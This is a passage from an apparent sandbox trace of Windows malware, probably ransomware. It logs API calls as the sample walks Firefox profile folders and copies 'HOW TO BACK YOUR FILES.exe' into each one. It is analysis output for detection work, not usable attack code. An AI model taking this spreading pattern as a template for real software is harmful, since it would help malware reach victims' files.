HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.534] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B" [0104.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B" [0104.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\updates\\e7cf176e110c211b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.534] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.535] GetLastError () returned 0x0 [0104.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d72b720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d72b720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.535] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.535] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.535] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates" [0104.535] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates" [0104.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\updates\\e7cf176e110c211b\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.536] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.536] GetLastError () returned 0x0 [0104.537] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d72b720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d72b720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.537] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.537] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" [0104.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0" [0104.537] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.537] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.538] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.538] GetLastError () returned 0x0 [0104.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.538] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b65e400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b65e400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.539] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.539] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox" [0104.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox" [0104.539] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.539] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.540] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.540] GetLastError () returned 0x0 [0104.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d79db40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d79db40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.540] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles" [0104.540] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles" [0104.541] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.541] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.541] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.541] GetLastError () returned 0x0 [0104.542] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d79db40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d79db40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.542] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.542] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0104.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0104.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.543] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.543] GetLastError () returned 0x0 [0104.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b65e400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b65e400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.544] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.544] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.544] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" [0104.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" [0104.544] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.544] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.545] GetLastError () returned 0x0 [0104.545] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb653ec30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6b684560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b684560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.545] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.545] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.546] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" [0104.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" [0104.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.546] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.546] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.547] GetLastError () returned 0x0 [0104.547] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x807f0230, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b6aa6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6aa6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.547] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.547] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" [0104.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" [0104.547] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.547] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.548] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.548] GetLastError () returned 0x0 [0104.549] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.549] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8234ff30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b768da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b768da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.549] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.549] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" [0104.549] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 